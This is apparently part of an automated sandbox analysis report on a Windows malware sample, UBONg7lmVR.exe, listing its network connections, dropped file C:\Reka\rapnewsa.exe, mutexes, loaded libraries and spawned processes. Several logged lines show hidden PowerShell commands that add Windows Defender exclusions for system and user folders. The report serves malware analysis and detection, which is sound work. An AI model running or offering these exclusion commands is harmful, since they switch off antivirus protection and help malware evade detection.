Source: UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.216.51.233:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.125.66.18:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: UBONg7lmVR.exe, 00000000.00000002.3548819420.0000000007549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine need more dataREQUEST_METHODunreachable: RCodeNameErrorResourceHeadermime/multipartdata truncatednew_example.txtStatus code: %dstatus code: %dnegative updateaccept-encodingaccept-languagex-forwarded-forAccept-Encodingrecv_rststream_Idempotency-KeyPartial ContentRequest TimeoutLength RequiredNot ImplementedGateway Timeoutunexpected typebad trailer keywrite error: %wGetProcessTimesDuplicateHandleadvertise errorkey has expirednetwork is downno medium foundno such processGetAdaptersInfoCreateHardLinkWDeviceIoControlFlushViewOfFileGetCommandLineWGetStartupInfoWProcess32FirstWUnmapViewOfFileFailed to load Failed to find : cannot parse ,M3.2.0,M11.1.0ExcludeClipRectGetEnhMetaFileWGetTextMetricsWPlayEnhMetaFileGdiplusShutdownGetThreadLocaleOleUninitializewglGetCurrentDCDragAcceptFilesCallWindowProcWCreatePopupMenuCreateWindowExWDialogBoxParamWGetActiveWindowGetDpiForWindowGetMonitorInfoWGetRawInputDataInsertMenuItemWIsWindowEnabledIsWindowVisiblePostQuitMessageSetActiveWindowSetWinEventHookTrackMouseEventWindowFromPointDrawThemeTextExGetSecurityInfoImpersonateSelfOpenThreadTokenSetSecurityInfoAddDllDirectoryFindNextVolumeWFindVolumeCloseGetCommTimeoutsIsWow64Process2QueryDosDeviceWSetCommTimeoutsSetVolumeLabelWRtlDefaultNpAclCLSIDFromStringStringFromGUID2IsWindowUnicodetimeBeginPeriodinvalid argSize<invalid Value>476837158203125record overflowbad certificatePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512ClientAuthType(unknown versionAccept-LanguageX-Forwarded-Formissing address/etc/mdns.allowunknown network()<>@,;:\"/[]?=allocmRInternalwrite heap dumpasyncpreemptoffforce gc (idle)sync.Mutex.Lockmalloc deadlockruntime error: elem size wrong with GC progmemstr_03833754-2
Source: C:\Reka\rapnewsa.exeCode function: 23_2_002C1470 NtQuerySystemInformation,OpenProcess,GetCurrentProcess,DuplicateHandle,GetFileType,CloseHandle,GetCurrentProcess,DuplicateHandle,CloseHandle,FindCloseChangeNotification,23_2_002C1470
Source: C:\Reka\rapnewsa.exeCode function: 23_2_002C3D50 NtClose,NtClose,23_2_002C3D50
Source: C:\Reka\rapnewsa.exeCode function: 23_2_002C1610 NtQueryObject,NtQueryObject,23_2_002C1610
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_05BD545B0_2_05BD545B
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_05BD3CFC0_2_05BD3CFC
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_098582480_2_09858248
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_098504C40_2_098504C4
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_09852C100_2_09852C10
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_098510500_2_09851050
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_098510600_2_09851060
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_098582380_2_09858238
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_098506A00_2_098506A0
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_098997010_2_09899701
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_098997100_2_09899710
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0AD1B8210_2_0AD1B821
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0AD185B70_2_0AD185B7
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0B3A46C30_2_0B3A46C3
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0B3A09200_2_0B3A0920
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0B3A15930_2_0B3A1593
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0B3A27180_2_0B3A2718
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0B3A09200_2_0B3A0920
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0B3A22500_2_0B3A2250
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0B3A46C30_2_0B3A46C3
Source: Joe Sandbox ViewDropped File: C:\Reka\rapnewsa.exe 0A6BF0678BBD793E39A84DFB4C71D8B709D9E538288BF826C48B1BA899803BA4
Source: C:\Reka\rapnewsa.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 122888
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: Number of sections : 15 > 10
Source: UBONg7lmVR.exe, 00000000.00000000.1675999694.0000000003904000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameInstaller Driver.exeB vs UBONg7lmVR.exe
Source: UBONg7lmVR.exe, 00000000.00000002.3547008907.0000000003D6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs UBONg7lmVR.exe
Source: UBONg7lmVR.exeBinary or memory string: OriginalFilenameInstaller Driver.exeB vs UBONg7lmVR.exe
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: Section: /19 ZLIB complexity 0.9991581357758621
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: Section: /32 ZLIB complexity 0.9933081454918032
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: Section: /65 ZLIB complexity 0.9992535231210021
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: Section: /78 ZLIB complexity 0.9908877648782687
Source: classification engineClassification label: mal75.evad.winEXE@27/32@5/6
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeFile created: C:\Users\user\Desktop\new_example.txtJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Reka\rapnewsa.exeMutant created: \Sessions\1\BaseNamedObjects\082e2202-17f7-4654-a651-ac9a3778e1d7
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:916:120:WilError_03
Source: C:\Users\user\Desktop\UBONg7lmVR.exeFile created: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeFile opened: C:\Windows\system32\bd5cd1aabb1ffcda4133e746297f9fdc95781f77f84a826557ea6679c7876c2dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
Source: UBONg7lmVR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: UBONg7lmVR.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Reka\rapnewsa.exeSystem information queried: HandleInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: UBONg7lmVR.exeVirustotal: Detection: 13%
Source: unknownProcess created: C:\Users\user\Desktop\UBONg7lmVR.exe "C:\Users\user\Desktop\UBONg7lmVR.exe"
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess created: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe "C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Reka\rapnewsa.exe C:\Reka\rapnewsa.exe
Source: C:\Reka\rapnewsa.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 122888
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess created: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe "C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Reka\rapnewsa.exe C:\Reka\rapnewsa.exeJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
